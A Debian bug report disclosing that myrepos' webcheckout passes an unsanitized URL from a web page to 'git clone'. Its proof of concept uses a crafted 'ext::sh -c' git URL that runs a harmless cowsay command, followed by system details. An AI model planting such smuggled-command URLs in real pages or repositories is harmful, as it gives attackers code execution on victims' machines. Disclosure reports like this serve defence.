Package: myrepos
Version: 1.20160123
Tags: security
webcheckout passes the extracted URL to "git clone", without any sanitization.
Malicious website operators or MitM attackers could exploit it for arbitrary
code execution.
PoC:
$ webcheckout /path/to/badgit.html
git clone ext::sh -c cowsay% pwned% >% /dev/tty
Cloning into 'tty'...
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
fatal: Could not read from remote repository.
-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 4.7.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
myrepos depends on no packages.
Versions of packages myrepos recommends:
ii libhtml-parser-perl 3.72-2+b1
ii libio-pty-easy-perl 0.09-2
ii libwww-perl 6.15-1
ii perl 5.24.1~rc3-3
Versions of packages myrepos suggests:
pn ack-grep <none>
ii bzr 2.7.0+bzr6619-2
ii curl 7.50.1-1
pn cvs <none>
pn darcs <none>
pn fossil <none>
ii git [git-core] 1:2.9.3-1
pn kdesdk-scripts <none>
ii liburi-perl 1.71-1
ii mercurial 3.9.1-1
ii subversion 1.9.4-3+b1
pn subversion-tools <none>
pn vcsh <none>
--
Jakub Wilk
% /dev/tty" />